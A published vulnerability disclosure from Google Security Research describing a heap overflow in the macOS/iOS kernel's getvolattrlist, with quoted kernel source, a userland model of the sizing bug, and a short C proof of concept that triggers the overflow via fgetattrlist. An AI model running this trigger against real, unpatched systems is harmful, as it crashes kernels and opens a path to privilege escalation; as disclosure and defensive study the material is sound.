Apple macOS/iOS Kernel - Heap Overflow Due to Lack of Lower Size Check in getvol
Source: Google Security Research  Author: Google  Published: 2018-06-11
/*
getvolattrlist takes a user controlled bufferSize argument via the fgetattrlist syscall.
 
When allocating the kernel buffer that the attr list is serialized into, there's the following comment:
 
  /*
   * Allocate a target buffer for attribute results.
   * Note that since we won't ever copy out more than the caller requested,
   * we never need to allocate more than they offer.
   */
  ab.allocated = ulmin(bufferSize, fixedsize + varsize);
  if (ab.allocated > ATTR_MAX_BUFFER) {
    error = ENOMEM;
    VFS_DEBUG(ctx, vp, "ATTRLIST - ERROR: buffer size too large (%d limit %d)", ab.allocated, ATTR_MAX_BUFFER);
    goto out;
  }
  MALLOC(ab.base, char *, ab.allocated, M_TEMP, M_ZERO | M_WAITOK);
 
The problem is that the code doesn't then correctly handle the case when the user-supplied buffer size
is smaller than the requested header size. If we pass ATTR_CMN_RETURNED_ATTRS we'll hit the following code:
 
  /* Return attribute set output if requested. */
  if (return_valid) {
    ab.actual.commonattr |= ATTR_CMN_RETURNED_ATTRS;
    if (pack_invalid) {
      /* Only report the attributes that are valid */
      ab.actual.commonattr &= ab.valid.commonattr;
      ab.actual.volattr &= ab.valid.volattr;
    }
    bcopy(&ab.actual, ab.base + sizeof(uint32_t), sizeof (ab.actual));
  }
 
There's no check that the allocated buffer is big enough to hold even that header (sizeof(uint32_t) + sizeof(ab.actual) bytes); ab.allocated may be as small as the caller's bufferSize.
 
Tested on MacOS 10.13.4 (17E199)
*/
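As an added illustration (not part of the original report or of XNU), the sizing logic above modelled in userland C: the same min()/upper-bound computation the report quotes, followed by the lower-bound check it lacks, and a pack step that refuses the header write when it would not fit. The attribute_set_t layout, the ATTR_MAX_BUFFER value and the EINVAL return are assumptions of this model, not XNU's actual fix.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <errno.h>

/* Stand-in for XNU's attribute_set_t: five 32-bit bitmaps (20 bytes).
 * Assumed layout for this model. */
typedef struct {
    uint32_t commonattr, volattr, dirattr, fileattr, forkattr;
} attribute_set_t;

#define ATTR_MAX_BUFFER 8192            /* assumed value for the model */
#define MIN_U(a, b) ((a) < (b) ? (a) : (b))

/* Bytes the header write needs: 4-byte length word + attribute_set_t. */
#define RETURNED_ATTRS_HDR_SIZE (sizeof(uint32_t) + sizeof(attribute_set_t))

/* Models the buffer sizing in getvolattrlist. With check_lower_bound == 0
 * it reproduces the bug: allocation is min(bufferSize, needed) with only
 * an upper bound, so a 16-byte request yields a 16-byte buffer that the
 * later 24-byte header write overruns. With check_lower_bound != 0 it
 * rejects buffers too small for the header before anything is written.
 * Returns 0 and sets *out_allocated on success, else an errno value. */
int size_attr_buffer(size_t bufferSize, size_t fixedsize, size_t varsize,
                     int check_lower_bound, size_t *out_allocated)
{
    size_t allocated = MIN_U(bufferSize, fixedsize + varsize);
    if (allocated > ATTR_MAX_BUFFER)
        return ENOMEM;                  /* the only check the original has */
    if (check_lower_bound && allocated < RETURNED_ATTRS_HDR_SIZE)
        return EINVAL;                  /* the missing lower-bound check */
    *out_allocated = allocated;
    return 0;
}

/* Simulates the ATTR_CMN_RETURNED_ATTRS pack step. Returns 1 if the
 * header write would exceed the allocation (the heap overflow in the
 * report), 0 after performing it when it fits. base must hold at least
 * RETURNED_ATTRS_HDR_SIZE bytes; nothing is ever written out of bounds. */
int pack_returned_attrs(size_t allocated, const attribute_set_t *actual,
                        char *base)
{
    if (allocated < RETURNED_ATTRS_HDR_SIZE)
        return 1;
    memcpy(base + sizeof(uint32_t), actual, sizeof(*actual));
    return 0;
}
```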
 
// ianbeer
#if 0
MacOS/iOS kernel heap overflow due to lack of lower size check in getvolattrlist
 
#endif
 
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/attr.h>

int main() {
  // Any vnode will do for fgetattrlist; the filesystem root is always there.
  int fd = open("/", O_RDONLY);
  if (fd == -1) {
    perror("unable to open fs root");
    return 1;
  }

  struct attrlist al = {0};

  al.bitmapcount = ATTR_BIT_MAP_COUNT;
  al.volattr = 0xfff;                       // volume attributes: takes the getvolattrlist path
  al.commonattr = ATTR_CMN_RETURNED_ATTRS;  // forces the unconditional header bcopy shown above

  // 16 bytes: smaller than the 4-byte length word plus the attribute_set_t
  // header, so the kernel allocation is undersized and the bcopy overruns it.
  size_t attrBufSize = 16;
  void* attrBuf = malloc(attrBufSize);
  int options = 0;

  int err = fgetattrlist(fd, &al, attrBuf, attrBufSize, options);
  printf("err: %d\n", err);

  free(attrBuf);
  close(fd);
  return 0;
}
 